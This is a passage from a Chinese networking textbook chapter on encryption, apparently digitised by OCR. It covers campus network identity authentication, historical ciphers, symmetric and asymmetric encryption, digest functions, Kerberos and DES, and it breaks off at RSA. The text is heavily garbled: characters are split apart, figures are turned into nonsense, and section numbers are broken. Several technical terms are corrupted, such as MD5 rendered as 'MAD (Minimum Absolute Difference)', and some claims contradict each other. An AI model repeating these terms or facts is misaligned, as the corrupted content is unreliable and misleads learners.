有 效 的 阻 断 作 用 ,对 网 络 的 故障 可 以 迅速 定位 并 排除 。 


3. 解决 用 户 上 网 身份 问题 


建立 全 校 统一 的 身份 认证 系统 。 校 园 网 络 必须 要 解决 用 户 上 网 身份 问题 ,而 身份 认证 
系统 是 整个 校园 网 络 安全 体系 的 基础 的 基础 ,否则 即使 发 现 了 入 侵 行为 ,也 确定 不 了 後 事 
者 。 所 以 只 有 建立 了 基于 校园 网 络 的 全 校 统一 身份 认证 系统 ,才能 彻底 的 解决 用 户 上 网 身 
份 问题 ,同时 也 为 校园 信息 化 的 各 项 应 用 系统 提供 安全 可 靠 的 保障 。 


4. 严格 规范 上 网 场所 
对 上 网 场所 进行 集中 监控 和 管理 。 上 网 用 户 不 但 要 通过 统一 的 校 级 身份 认证 系统 确 
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认 ,而 且 , 合 法 用 户 上 网 的 行为 也 要 受到 统一 的 监控 ,上 网 行为 的 日 志 要 集中 保存 在 中 心服 
务 器 上 ,保证 这 个 记录 的 法 律 性 和 准确 性 。 


5. 出 台 网 络 安全 管理 制度 


网 络 安全 的 技术 是 多 样 化 的 ,网 络 安全 的 现状 还 是 “ 道 高 一 尺 , 魔 高 一 丈 ”, 因 此 管理 的 
工作 就 愈 发 重要 和 艰巨 ,必须 要 做 到 及 时 进行 漏洞 修补 和 定期 巡 检 ,保证 对 网 络 的 监控 和 


管理 。 
习题 


.网 络 安全 的 四 种 威胁 是 什么 ? 

. 攻击 的 三 种 主要 类 型 是 什么 ? 

. 为 什么 需要 网 络 安全 ? 

. 什么 是 网 络 侦 听 ? 

. 增强 局 域 网 安全 的 方案 有 哪些 ? 增强 广域网 安全 的 技术 有 哪些 ? 
. 数据 加 密 技 术 可 以 分 为 哪 三 类 ? 

.【 思 考题 】 怎 样 具 体 配置 一 个 实际 的 安全 的 校园 网 络 ? 


中 oo 


网 络 安全 与 信息 加 密 第 2 章 
技术 浅 析 


数据 保密 变换 或 密码 技术 ,是 对 计算 机 信息 进行 保护 的 最 实用 、 最 可 靠 
的 方法 , 它 是 网 络 安 全 技术 中 的 核心 技术 。 

本 章 要 点 如 下 : 

。 信息 加 密 的 技术 算法 ; 

。 加 密 技术 的 发 展 ; 

。 加 密 技术 的 应 用 。 


2.1 加 密 技 术 概述 


加 密 技术 是 一 门 古老 而 深奥 的 学 科 , 对 一 般 人 来 说 是 陌生 的 ,因为 长 期 
以 来 , 它 只 在 很 少 的 范围 内 (如 军事 、 外 交 、 情 报 等 部 门 ) 使 用 。 计 算 机 加 密 技 
术 是 研究 计算 机 信息 加 密 、 解 密 及 其 变换 的 科学 ,是 数学 和 计算 机 的 交叉 学 
科 , 也 是 一 门 新 兴 的 学 科 。 在 国外 , 它 已 成 为 计算 机 安全 主要 的 研究 方向 ,也 
是 计算 机 安全 课程 教学 中 的 主要 内 容 。 


21.1 加 密 技 术 的 起 源 


作为 保障 数据 安全 的 一 种 方式 ,加 密 的 历史 相当 久远 , 它 的 起 源 可 以 追 
溯 到 公元 前 2000 年 ,虽然 那 时 的 加 密 并 不 是 现在 所 讲 的 加 密 技术 (甚至 不 能 
叫做 加 密 ) ,但 作为 一 种 加 密 的 概念 ,确实 早 在 几 个 世纪 前 就 证 生 了 。 

近代 加 密 技 术 主 要 应 用 于 军事 领域 ,最 广为人知 的 编码 机 器 是 德国 的 
“ 迷 ” 加 密 器 , 它 的 应 用 和 最 终 被 破解 ,都 不 同 程度 地 影响 了 战争 的 进程 。 

随 着 计算 机 运算 能 力 的 增强 ,人 们 又 不 断 研究 出 了 新 的 数据 加 密 方 式 。 

我 国 的 加 密 技术 也 有 很 长 的 历史 。 前 一 段 时 间 , 中 央 电 视 台 热 播 的 电视 
连续 剧 ( 乔 家 大 院 ) 就 是 以 山西 的 日 升 昌 票 号 为 历史 背景 的 。 历 史上 日 升 昌 
是 我 国 第 一 家 票 号 , 票 号 实行 “ 认 票 不 认 人 , 见 票 即 付 ”的 原则 ,并 且 为 了 防止 
假冒 而 制定 了 一 套 防 伪 制 度 。 这 套 制度 包括 精心 印 制 汇票 ,如 将 泰 厚 的 汇票 
由 平遥 一 处 印 制 , 绿 线 红 格 , 并 有 水 印 * 蔚 泰 厚 ”三 字 ; 票 纸 有 数 ,如 有 报废 必 
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报 总 号 备案 ; 书 手 固定 ,由 一 人 书写 ,笔迹 可 辨 。 同 时 票面 中 加 有 * 水 印 ? 技 术 , 透 过 阳光 能 
看 到 纸 票 中 有 “日 升 昌 记 ” 四 个 字 。 

但 最 让 人 惊叹 的 是 日 升 昌 票 号 使 用 的 银行 密 押 制度 ,如 图 2. 1 所 示 ,也 就 是 现代 的 银行 
密码 。 这 种 密 押 制 度 是 用 汉字 代替 数字 ,其 原则 是 “月 对 上 暗号 ,日 对 暗号 , 银 总 上 暗号 ,对 自 瞳 
号 ”。 全 年 12 个 月 的 代码 是 “谨防 假 票 冒 取 , 勿 忘 细 视 书 章 ”; 每 月 30 天 的 代码 为 “ 堪 笑 世 
情 薄 ,天 道 最 公平 , 昧 心 图 自 利 ,阴谋 害 他 人 , 善 恶 终 有 报 ,到 头 必 分 明 ”; 代表 银两 的 10 个 
数目 分 别 是 “起 氏 连城 壁 ,由 来 天 下 传 ” 或 “ 生 客 多 察看 , 振 酌 而 后 行 ”; 而 “万 千 百 两 "的 数字 
单位 则 由 “国宝 流通 ”4 个 字 分 别 代 替 。 例 如 票 “3 月 25 日 为 某 号 汇 出 银两 3858 两 ”的 代码 
是 “ 假 报 连 宝 天 流 壁 传 天 通 ”, 汇 票 上 写 的 都 是 这 样 含义 不 明 , 让 人 摸 不 着 头脑 的 字句 ,即使 
外 人 捡 到 ,也 不 会 知道 是 一 张 几 千 两 银子 的 汇票 。 这 种 暗号 还 定期 更 换 , 以 免 汇 密 。 这 种 制 
度 既 保证 了 业务 畅通 ,又 防止 了 外 人 造假 诈骗 。 


地 办 珊 答 也 半 
六 本 兴 闪 各 际 
着 桨 六 于 


图 2.1 日 升 昌 密 码 


数据 加 密 的 基本 过 程 就 是 对 原来 为 明文 的 文件 或 数据 按 某 种 算法 进行 处 理 , 使 其 成 一 
段 为 不 可 读 的 代码 ,通常 称 为 “ 密 文 ,只 能 在 输入 相应 的 “ 密 钥 "之 后 才能 显示 出 本 来 内 容 ， 
通过 这 样 的 途径 来 达到 保护 数据 不 被 非法 窃取 阅读 的 目的 。 该 过 程 的 逆 过 程 为 解密 ,即将 
该 编码 信息 转化 为 其 原来 数据 的 过 程 。 


212 加 密 的 理由 


通过 网 络 进行 登录 时 ,所 输入 的 密码 以 明文 的 形式 被 传输 到 服务 器 ,而 在 网 络 上 窃取 用 
户 的 密码 是 一 件 很 容易 的 事 , 密 码 的 泄露 在 某 种 意义 上 来 讲 意味 着 安全 体系 的 全 面 崩溃 。 

解决 上 述 问题 的 方法 就 是 加 密 ,加密 后 的 口令 即使 被 信息 拦截 者 获得 也 是 不 可 读 的 ,加 
密 后 的 标书 没有 收 件 人 的 私 钥 也 无 法 解 开 。 从 某 种 意义 上 来 说 ,加 密 已 成 为 当今 网 络 社会 
进行 文件 或 邮件 安全 传输 的 时 代 象 征 。 

目前 比较 流行 的 数字 签名 技术 就 是 基于 复杂 的 加 密 算法 , 它 的 作用 是 确定 用 户 的 身份 。 
数字 签名 技术 在 发 送 电 子 邮 件 时 应 用 得 最 多 ,如 用 户 收 到 一 封 电 子 邮件 时 ,邮件 上 标 有 发 信 
人 的 姓名 和 信箱 地 址 ,很 多 人 可 能 会 简单 地 认为 发 信人 就 是 信 上 说 明 的 那个 人 ,但 实际 上 伪 
造 一 封 电子 邮件 对 于 一 个 普通 人 来 说 是 极为 容易 的 事 。 在 这 种 情况 下 ,就 要 用 到 数字 签名 
技术 ,用 它 来 确认 发 信人 身份 的 真实 性 。 

类 似 数字 签名 技术 的 还 有 一 种 身份 认证 技术 ,对 提供 FTP 和 WWW 服务 的 网 站 来 说 ， 
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如 何 确 定 正在 访问 服务 器 的 人 是 被 允许 的 访问 者 本 身 就 成 为 一 个 非常 重要 的 问题 ,而 身份 
认证 技术 就 是 一 个 很 好 的 解决 方案 。 

这 里 需要 强调 的 是 ,文件 加 密 其 实 不 仅仅 用 于 电子 邮件 或 网 络 上 的 文件 传输 , 它 也 可 用 
来 保护 静态 文件 ,如 PIP 软件 就 可 以 对 磁盘 、 硬 盘 中 的 文件 或 文件 夹 进行 加 密 , 以 防 他 人 窃 
取 其 中 的 信息 。 


213 数据 安全 的 组 成 


从 保护 数据 的 角度 讲 ,数据 安全 这 个 广义 的 概念 可 以 细 分 为 三 部 分 : 数据 加 密 、 数 据 传 
输 安 全 和 身份 认证 管理 。 

数据 加 密 就 是 按照 确定 的 密码 算法 将 敏感 的 明文 数据 变换 成 难以 识别 的 密 文 数据 , 通 
过 使 用 不 同 的 密 钥 ,可 用 同一 加 密 算 法 将 同一 明文 加 密 成 不 同 的 密 文 。 解 密 则 正好 和 加 密 
的 过 程 相反 ,解密 使 用 密 钥 将 密 文 数 据 还 原 成 明文 数据 。 数 据 加 密 被 公认 为 是 保护 数据 传 
输 安 全 唯一 实用 的 方法 和 保护 存储 数据 安全 的 有 效 方 法 , 它 是 数据 保护 在 技术 上 最 重要 的 一 
环 。 数 据 加 密 和 信道 编码 学 中 的 信 源 编码 十 分 相似 ,一 般 情况 下 加 密 的 数据 比 原始 数据 要 小 。 

数据 传输 安全 则 类 似 于 信道 编码 学 中 的 信道 编码 ,数据 量 通常 大 于 原始 数据 ,这 样 才能 
为 数据 传输 过 程 中 的 数据 安全 性 .完整 性 和 不 可 自 改 性 提供 必要 的 元 余数 据 。 

身份 认证 的 目的 是 确定 系统 和 网 络 的 访问 者 是 否 是 合法 用 户 。 主 要 采用 登录 密码 、 代 
表 用 户 身份 的 物品 (如 智能 卡 IC 卡 等 ) 或 反映 用 户 生 理 特 征 的 标志 鉴别 访问 者 的 身份 。 


214 信息 安全 的 体系 结构 


任何 一 个 加 密 系统 至 少 包 括 以 下 四 个 组 成 部 分 。 
Q@ 未 加 密 的 报 文 ,也 称 明文 。 

@ 加 密 后 的 报 文 , 也 称 密 文 。 

@ 加 密 解 密 设备 或 算法 。 

@ 加 密 解 密 的 密 钥 。 

信息 安全 技术 的 体系 结构 图 ,如 图 2.2 所 示 。 


监控 、 扫描 仿 测 


访问 控制 | 一 ~| 加 密 认 证 与 密 钥 管理 一 一 一 | 安全 审计 


| 


攻击 防护 安全 协议 | | 病毒 防护 


图 2.2 信息 安全 技术 的 体系 结构 图 
215 密码 的 分 类 
1. 按 应 用 技术 或 历史 发 展 阶段 划分 
@ 手工 密码 : 以 手工 方式 或 者 以 简单 器 具 辅 助 操作 完成 的 密码 ,叫做 手工 密码 。 第 一 
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次 世界 大 战 前 主要 使 用 这 种 方式 。 

@ 机 械 密码 : 以 机 械 密码 机 或 电动 密码 机 来 完成 加 解密 作业 的 密码 ,叫做 机 械 密码 。 
这 种 密码 在 第 一 次 世界 大 战 中 出 现 ,到 第 二 次 世界 大 战 时 得 到 普遍 应 用 。 

@ 电子 机 内 乱 密 码 : 通过 电子 电路 ,以 严格 的 程序 进行 逻辑 运算 ,以 少量 制 乱 元 素 生 
产 大 量 的 加 密 乱 数 ,因为 其 制 乱 是 在 加 解密 过 程 中 完成 的 而 不 需 预 先 制作 ,所 以 称 为 电子 机 
内 乱 密码 。 这 种 密码 在 20 世纪 50 年 代 末 期 出 现 , 到 70 年 代 已 得 到 广泛 应 用 。 

@ 计算 机 密码 : 加 密 算 法 主要 由 计算 机 软件 完成 ,是 目前 使 用 最 广泛 的 加 密 方式 。 


2. 按 保密 程度 划分 


@ 理论 上 保密 的 密码 : 不 管 获取 多 少 密 文 和 有 多 大 的 计算 能 力 , 对 明文 始终 不 能 得 到 
唯一 解 的 密码 , 叫 作 理论 上 保密 的 密码 ,也 叫 理论 不 可 破 的 密码 ,如 客观 随机 一 次 一 密 的 密 
码 就 属于 这 种 。 

@ 实际 上 保密 的 密码 : 在 理论 上 可 破 , 但 在 现 有 客观 条 件 下 ,无 法 通过 计算 来 确定 唯 
一 解 的 密码 , 叫 作 实际 上 保密 的 密码 。 

@@ 不 保密 的 密码 : 在 获取 一 定数 量 的 密 文 后 可 以 得 到 唯一 解 的 密码 , 叫 作 不 保密 密 
码 。 如 早期 的 单 表 代 蔡 密码 ,后 来 的 多 表 代 替 密 码 以 及 明文 加 少量 密 钥 等 密码 ,现在 都 是 不 
保密 的 密码 。 

3. 按 密 钥 方式 划分 

中 对 称 式 密码 : 收发 双方 使 用 相同 密 钥 的 密码 , 叫 作 对 称 式 密码 。 传 统 的 密码 都 属 
此 类 。 


@ 非 对 称 式 密码 : 收发 双方 使 用 不 同 密 钥 的 密码 , 叫 作 非 对 称 式 密码 。 如 现代 密码 中 
的 公共 密 钥 密码 就 属 此 类 。 


4. 按 明 文 形态 划分 


Q@ 模拟 型 密码 : 用 以 加 密 模拟 信息 。 如 对 动态 范围 内 连续 变化 的 语音 信号 加 密 的 密 
码 ,就 叫 作 模 拟 型 密码 。 

@ 数字 型 密码 : 用 于 加 密 数 字 信息 。 如 对 两 个 离散 电 平 构成 0、1 二 进 制 关系 的 电报 信 
息 加 密 的 密码 就 叫 作 数字 型 密码 。 


5. 按 编制 原理 划分 


可 分 为 移 位 .代替 和 置换 三 种 以 及 它们 的 组 合 形式 。 
古今 中 外 的 密码 ,不 论 其 形式 多 么 繁杂 ,变化 多 么 巧妙 ,都 是 按照 这 三 种 基本 原理 编制 
出 来 的 。 


2.2 数据 加 密 


在 保障 信息 安全 的 诸多 技术 中 ,加 密 技 术 是 信息 安全 的 核心 和 关键 技术 。 通 过 数据 加 
密 技术 ,可 以 在 一 定 程度 上 提高 数据 传输 的 安全 性 ,保证 传输 数据 的 完整 性 。 一 个 数据 加 密 
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系统 包括 加 密 算法 、 明 文 、 密 文 以 及 密 钥 , 密 钥 控制 加 密 和 解密 过 程 。 一 个 加 密 系统 的 全 部 

安全 性 是 基于 密 钥 , 而 不 是 基于 算法 .所 以 加 密 系统 的 密 钥 管理 是 一 个 非常 重要 的 问题 。 
数据 加 密 过 程 就 是 通过 加 密 系统 把 原始 的 数字 信息 (明文 ) ,按照 加 密 算法 变换 成 与 明 

文 完全 不 同 的 数字 信息 ( 密 文 ) 的 过 程 , 如 图 2. 3 所 示 。 

加 密 密 钥 解密 密 钥 

1 1 时 

加 密 -| RE 


明文 | 


2.3 数据 加 密 过 程 


221 数据 加 密 技术 


数据 加 密 技术 主要 包括 数据 传输 加 密 和 数据 存储 加 密 。 数 据 传输 加 密 技术 主要 是 对 传 
输 中 的 数据 流 进行 加 密 , 常 用 的 有 和 链 路 加 密 、 结 点 加 密 和 端 到 端 加 密 三 种 方式 。 

链 路 加 密 是 对 传输 数据 仅 在 物理 层 前 的 数据 链 路 层 进行 加 密 , 不 考虑 信 源 和 信 宿 , 它 用 
于 保护 通信 结 点 间 的 数据 ,接收 方 是 传输 路 径 上 的 各 台 结 点 机 ,数据 在 每 台 结 点 机 内 都 要 被 
解密 和 再 加 密 , 这 一 过 程 是 依次 进行 的 ,直至 到 达 目 的 地 。 

与 链 路 加 密 类 似 的 结 点 加 密 方法 ,在 结 点 处 采用 一 个 与 结 点 机 相连 的 密码 装置 , 密 文 在 
该 装置 中 被 解密 并 被 重新 加 密 ,而 明文 不 通过 结 点 机 ,从 而 克服 了 链 路 加 密 结 点 处 易 受 攻击 
的 缺点 。 

端 到 端 加 密 是 为 数据 从 一 端 到 另 一 端 提供 的 加 密 方式 。 数 据 在 发 送 端 被 加 密 , 在 接收 
端 解密 ,中 间 结 点 处 不 以 明文 的 形式 出 现 。 端 到 端 加 密 是 在 应 用 层 完 成 的 。 在 端 到 端 加 密 
中 , 除 报头 外 的 报 文 均 以 密 文 的 形式 贯穿 于 全 部 传输 过 程 ,只 是 在 发 送 端 和 接收 端 才 有 加 、 
解密 设备 ,而 在 中 间 任 何 结 点 报 文 均 不 解密 ,因此 , 端 到 端 加 密 不 需要 有 密码 设备 。 同 链 路 
加 密 相 比 , 端 到 端 加 密 可 减少 密码 设备 的 数量 。 另 一 方面 ,信息 是 由 报头 和 报 文 组 成 的 , 报 
文 为 要 传送 的 信息 ,报头 为 路 由 选择 信息 ,由 于 网 络 传输 中 要 涉及 到 路 由 选择 ,所 以 在 链 路 
加 密 时 , 报 文 和 报头 两 者 均 须 加 密 。 而 在 端 到 端 加 密 时 ,由 于 通道 上 的 每 一 个 中 间 结 点 虽 不 
对 报 文 解密 ,但 为 将 报 文 传送 到 目的 地 ,也 必须 检查 路 由 选择 信息 ,因此 , 端 到 端 加 密 只 能 加 
密 报 文 , 而 不 能 对 报头 加 密 。 这 样 就 容易 被 某 些 通信 分 析 发 觉 ,而 从 中 获取 某 些 敏 感 信息 。 

链 路 加 密 对 用 户 来 说 比较 容易 ,使 用 的 密 钥 较 少 ,而 端 到 端 加 密 比 较 灵活 。 在 对 链 路 加 
密 中 各 结 点 安全 状况 不 放心 的 情况 下 ,也 可 使 用 端 到 端 加 密 方式 。 


1. 两 种 加 密 技术 


加 密 技术 通常 分 为 两 大 类 : 对 称 式 和 非 对 称 式 。 

对 称 式 加 密 就 是 加 密 和 解密 使 用 同一 个 密 钥 ,通常 称 之 为 话 路 密 钥 (Session Key)。 这 
种 加 密 技 术 目 前 被 广泛 采用 .如 美国 政府 所 采用 的 数据 加 密 标准 (Data Encryption 
Standard,DES) 就 是 一 种 典型 的 对 称 式 加 密 . 它 的 密 钥 长 度 为 56 位 (bit) 。 

非 对 称 式 加 密 就 是 加 密 和 解密 使 用 不 同 密 钥 ,通常 有 两 个 密 钥 , 称 为 “ 公 钥 ” 和 ”* 私 钥 ”， 
它们 两 个 必须 配对 使 用 ,否则 就 不 能 打开 加 密 文件 。 这 里 的 “ 公 钥 ”是 指 可 以 对 外 公布 的 ， 
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“ 私 钥 ? 则 只 能 由 持 有 人 一 个 人 知道 。 它 的 优越 性 就 在 这 里 ,因为 对 称 式 的 加 密 方法 如 果 是 
在 网 络 上 传输 加 密 文件 就 很 难 把 密 钥 告 诉 对 方 ,因为 不 管用 什么 方法 都 有 可 能 被 别人 窃听 
到 。 而 非 对 称 式 的 加 密 方法 有 两 个 密 钥 , 且 其 中 的 “ 公 钥 ”是 可 以 公开 的 ,也 就 不 怕 别 人 知 
道 , 收 件 人 解密 时 只 要 用 自己 的 私 钥 即 可 ,这 样 就 很 好 地 克服 了 密 钥 的 传输 安全 性 问题 。 


2. 加 密 技术 中 的 摘要 函数 


摘要 是 一 种 防止 改动 的 方法 ,其 中 用 到 的 函数 叫 摘要 函数 。 这 些 函数 的 输入 可 以 是 任 
意 大 小 的 消息 ,而 输出 则 是 一 个 固定 长 度 的 摘要 。 当 用 户 改变 了 输入 消息 中 的 任何 东西 , 哪 
怕 只 有 一 位 ,输出 的 摘要 也 会 发 生 不 可 预测 的 改变 ,也 就 是 说 输入 消息 的 每 一 位 对 输出 摘要 
都 有 影响 。 数 字 签 名 进行 身份 认证 ,可 以 防止 有 人 从 一 个 签名 上 获取 文本 信息 或 改变 文本 
信息 内 容 。 摘 要 算法 的 数字 签名 原理 在 很 多 加 密 算法 中 都 被 使 用 ,如 SO/KEY 和 PGP 
(Pretty Good Privacy) 。 

MAD(Minimum Absolute Difference) 摘 要 算法 的 设计 利用 32 位 (bit) RISC 结构 来 实 
现 最 大 的 吞吐 量 ,MAD 算法 是 以 消息 给 予 的 长 度 作为 输入 ,产生 一 个 128 位 的 “指纹 ”或 
“消息 化 ”。 要 产生 两 个 具有 相同 消息 化 的 文字 块 或 者 产生 任何 具有 预先 给 定 “ 指 纹 ” 的 消 
息 ,都 被 认为 在 计算 上 是 不 可 能 的 。 


3. 密 钥 的 管理 


密 钥 既 然 要 求 保密 ,就 涉及 到 密 钥 的 管理 问题 ,管理 不 好 , 密 钥 同样 可 能 在 无 意 中 被 汇 
露 ,因此 并 不 是 有 了 密 钥 就 高 枕 无 忧 ,任何 保密 只 是 相对 的 ,也 是 有 时 效 性 的 。 要 管理 好 密 
钥 ,还 要 注意 以 下 几 个 方面 。 

(1) 密 钥 的 使 用 要 注意 时 效 和 次 数 

如 果 用 户 长 时 间 使 用 同样 密 钥 与 别人 交换 信息 ,那么 密 钥 也 同 其 他 任何 密码 一 样 存在 
着 一 定 的 不 安全 性 ,使 用 一 个 特定 密 钥 加 密 的 信息 越 多 ,提供 给 窃听 者 的 材料 也 就 越 多 , 窃 
听 者 甚至 可 以 从 海量 信息 中 发 现 特定 的 规律 。 

因此 ,建议 将 一 个 对 话 密 钥 用 于 一 条 信息 中 或 一 次 对 话 中 ,或 者 建立 一 种 按时 更 换 密 钥 
的 机 制 以 减 小 密 钥 暴露 的 可 能 性 。 

(2) 多 密 钥 的 管理 

假设 在 某 机 构 中 有 100 个 人 ,如 果 他 们 任意 两 人 之 间 可 以 进行 秘密 对 话 ,那么 总 共 需 要 
多 少 密 钥 呢 ? 每 个 人 需要 知道 多 少 密 钥 呢 ? 计算 结果 是 : 如 果 任 何 两 个 人 之 间 用 不 同 的 密 
钥 , 则 总 共 需 要 4950 个 密 钥 ,而 且 每 个 人 应 记 住 99 个 密 钥 。 如 果 机 构 的 人 数 是 1000、 
10 000 人 或 更 多 ,管理 密 钥 将 变 成 一 件 可 怕 的 事情 。 

Kerberos 提供 了 一 种 较 好 的 解决 方案 ,使 保密 密 钥 的 管理 和 分 发 变 得 十 分 容易 ,Kerberos 
建立 了 一 个 安全 的 、 可 信任 的 密 钥 分 发 中 心 (Key Distribution Center,KDC) ,每 个 用 户 只 需 
要 知道 一 个 和 KDC 进行 会 话 的 密 钥 就 可 以 了 ,而 不 需要 知道 成 百 上 千 个 不 同 的 密 钥 。 

假设 用 户 甲 想 要 和 用 户 乙 进行 秘密 通信 , 则 用 户 甲 先 和 KDC 通信 ,用 只 有 用 户 甲 和 
KDC 知道 的 密 钥 进 行 加 密 , 用 户 甲 告诉 KDC 他 想 和 用 户 乙 进行 通信 ,KDC 会 为 用 户 甲 和 
用 户 乙 之 间 的 会 话 随 机 选择 一 个 对 话 密 钥 , 并 生成 一 个 标签 ,这 个 标签 由 KDC 和 用 户 乙 之 
间 的 密 钥 进行 加 密 ,并 在 用 户 甲 启动 和 用 户 乙 对 话 时 .用户 甲 会 把 这 个 标签 交 给 用 户 乙 。 这 
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个 标签 的 作用 是 让 用 户 甲 确信 和 他 交谈 的 是 用 户 乙 ,而 不 是 冒充 者 。 因 为 这 个 标签 是 由 只 
有 用 户 乙 和 KDC 知道 的 密 钥 进行 加 密 的 .所 以 即使 冒充 者 得 到 用 户 甲 发 出 的 标签 也 不 可 
能 进行 解密 ,只 有 用 户 乙 收 到 后 才能 够 进行 解密 ,从 而 确定 了 与 用 户 甲 对 话 的 人 就 是 用 
Pla 

当 KDC 生成 标签 和 随机 会 话 密码 时 ,就 会 把 它们 用 只 有 用 户 甲 和 KDC 知道 的 密 钥 进 
行 加 密 , 然 后 把 标签 和 会 话 密 钥 传 给 用 户 甲 ,加密 的 结果 可 以 确保 只 有 用 户 甲 能 得 到 这 个 信 
息 , 只 有 用 户 甲 能 利用 这 个 会 话 密 钥 和 用 户 乙 进行 通话 。 同 理 ,KDC 会 把 会 话 密码 用 只 有 
KDC 和 用 户 乙 知 道 的 密 钥 加 密 , 并 把 会 话 密 钥 传 给 用 户 乙 。 

为 了 保证 安全 ,每 次 会 话 的 密 钥 只 使 用 一 次 ,这 样 窃听 者 就 更 难 进 行 破解 了 。 同 时 由 于 
密 钥 是 一 次 性 由 系统 自动 产生 的 ,用 户 不 必 再 记 住 繁多 的 密 钥 ,方便 了 使 用 。 


222 数据 加 密 算法 


数据 加 密 算法 有 很 多 种 ,按照 发 展 进程 可 分 为 : 古典 密码 、 对 称 密 钥 密 码 和 公开 密 钥 密 
码 阶 段 ,古典 密码 算法 包括 蔡 代 加 密 、 置 换 加 密 ; 对 称 加 密 算法 包括 DES 和 AES; 非 对 称 
加 密 算法 包括 RSA 背包 密码 .McEliece 密码 .Rabin .椭圆 曲线 `.EIGamalD_H 等 。 目 前 在 
数据 通信 中 使 用 最 广泛 的 算法 有 DES 算法 、RSA 算法 和 PGP 算法 等 。 


1. DES 加 密 算法 


(1) DES 加 密 算法 的 起 源 

保密 密 钥 或 对 称 密 钥 加 密 算 法 DES 是 IBM 公司 在 20 世纪 70 年 代 发 展 起 来 ,于 1977 
年 由 美国 国家 标准 局 颁布 的 一 种 加 密 算 法 。 起 初 主要 用 于 民用 敏感 信息 的 加 密 , 后 来 被 国 
际 标准 化 组 织 接受 为 国际 标准 。 

(2) DES 加 密 算法 的 原理 

DES 是 一 种 对 二 元 数据 进行 加 密 的 算法 ,数据 分 组 长 度 为 64 位 , 密 文 分 组 长 度 也 是 64 
位 ,使 用 的 密 钥 为 64 位 ,有 效 密 钥 长 度 为 56 位 ,有 8 位 用 于 奇偶 校 验 , 解 密 时 的 过 程 和 加 密 
时 相似 ,但 密 钥 的 顺序 正好 相反 。 

DES 使 用 56 位 密 钥 对 64 位 的 数据 块 进行 加 密 , 并 对 64 位 的 数据 块 进行 16 轮 编码 。 
与 每 轮 编码 时 ,一 个 48 位 的 “每 轮 ” 密 钥 值 由 56 位 的 完整 密 钥 得 出 。 

DES 算法 仅 使 用 最 大 为 64 位 的 标准 算术 和 逻辑 运算 ,运算 速度 快 , 密 钥 生 产 容 易 , 适 
合 于 在 当前 大 多 数 计 算 机 上 用 软件 方法 实现 ,同时 也 适合 在 专用 芯片 上 实现 。 

DES 使 用 软件 进行 解码 需 用 很 长 时 间 , 而 用 硬件 解码 速度 非常 快 。 幸 运 的 是 ,当时 大 
多 数 黑 客 并 没有 足够 的 设备 制造 出 这 类 硬件 设备 。 在 1977 年 ,估计 要 耗资 两 千 万 美元 才能 
建成 一 个 用 于 DES 解密 的 专用 计算 机 ,而 且 需 要 12 个 小 时 的 破解 时 间 才 能 得 到 结果 。 当 
时 DES 被 认为 是 一 种 十 分 安全 的 加 密 方法 。 

但 是 随 着 计算 机 硬件 的 速度 越 来 越 快 ,破解 一 台 进行 了 DES 加 密 的 服务 器 也 已 成 为 可 
能 ,在 后 面 的 章节 中 会 把 DES 和 其 他 加 密 算法 进行 性 能 和 安全 性 的 对 比 。 

(3) DES 主要 的 应 用 范围 

计算 机 网 络 通信 : 对 计算 机 网 络 通 信 中 的 数据 提供 保护 是 DES 的 一 项 重要 应 用 . 但 
这 些 被 保护 的 数据 一 般 只 限于 民用 敏感 信息 , 即 不 在 政府 确定 的 保密 范围 之 内 的 信息 。 
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电子 资金 传输 系统 : 采用 DES 的 方法 加 密 电子 资金 传送 系统 中 的 信息 ,可 准确 .快速 
地 传输 数据 ,并 可 较 好 地 解决 信息 安全 的 问题 。 

保护 用 户 文件 : 用 户 可 自选 密 钥 对 重要 文件 进行 加 密 ,防止 被 未 授权 用 户 窃 密 。 

用 户 识别 : DES 还 可 用 于 计算 机 用 户 识别 系统 中 。 

(4) DES 加 密 算 法 的 弱点 

DES 是 一 种 世界 公认 的 较 好 的 加 密 算法 。 自 它 问 世 20 多 年 来 ,一 直 成 为 密码 界 研究 
的 重点 ,经 受 住 了 许多 科学 家 的 研究 和 破译 ,使 它 在 民用 密码 领域 得 到 了 广泛 的 应 用 。 它 也 
曾 为 全 球 贸易 .金融 等 非 官方 部 门 提供 了 可 靠 的 通信 安全 保障 。 但 是 任何 加 密 算 法 都 不 可 
能 是 十 全 十 美的 。 

DES 算法 的 弱点 是 不 能 提供 足够 的 安全 性 。 因 为 其 密 钥 容量 只 有 56 位 ,这 就 影响 了 
它 的 保密 强度 。 此 外 由 于 DES 算法 完全 公开 ,其 安全 性 完全 依赖 于 对 密 钥 的 保护 ,必须 有 
可 靠 的 信道 来 分 发 密 钥 , 如 采用 信使 递送 密 钥 。 因 此 它 不 适合 在 网 络 环境 下 单独 使 用 。 

针对 密 钥 短 的 问题 ,人 们 又 研制 出 了 80 位 的 密 钥 ,以 及 在 DES 的 基础 上 采用 三 重 DES 
和 双 密 钥 加 密 的 方法 。 即 用 两 个 56 位 的 密 钥 K1、K2, 发 送 方 用 Kl 加 密 ,K2 解密 ,再 使 用 
Kl 加 密 。 接 收 方 则 使 用 K1 解密 , K2 加 密 , 再 使 用 K1 解密 ,其 效果 相当 于 将 密 钥 长 度 
加 信 。 


2. RSA 算法 


(1) RSA 算法 的 起 源 

20 世纪 70 年 代 ,美国 斯 坦 福 大 学 的 两 名 学 者 迪 菲 和 赫 尔 曼 提出 了 一 种 加 密 方法 : 公开 
密 钥 加 密 队 PKE 方法 。 与 传统 的 加 密 方法 不 同 ,该 技术 采用 两 个 不 同 的 密 钥 来 对 信息 加 密 
和 解密 ,也 称 为 非 对 称 式 加 密 方法 。 每 个 用 户 有 一 个 对 外 公开 的 加 密 算 法 E 和 对 外 保密 的 
解密 算法 D, 它 们 须 满足 条 件 : 

Q@D 是 E 的 逆 , 即 DLE(X)]=X; 

@E 和 D 都 容易 计算 。 

由 下 出 发 去 求解 D 十 分 困难 。 

从 上 述 条 件 可 看 出 ,公开 密 钥 密 码 体制 下 ,加密 密 钥 不 等 于 解密 密 钥 。 加 密 密 钥 可 对 外 
公开 ,使 任何 用 户 都 可 将 传送 给 此 用 户 的 信息 用 公开 密 钥 加 密 发 送 ,而 该 用 户 唯一 保存 的 私 
人 密 钥 是 保密 的 ,也 只 有 它 能 将 密 文 复原 解密。 虽然 解密 密 钥 理论 上 可 由 加 密 密 钥 推算 出 
来 ,但 这 种 算法 设计 在 实际 操作 上 是 不 可 能 的 ,虽然 能 够 推算 出 ,但 要 花费 很 长 的 时 间 。 所 
以 将 加 密 密 钥 公开 也 不 会 危害 密 钥 的 安全 。 

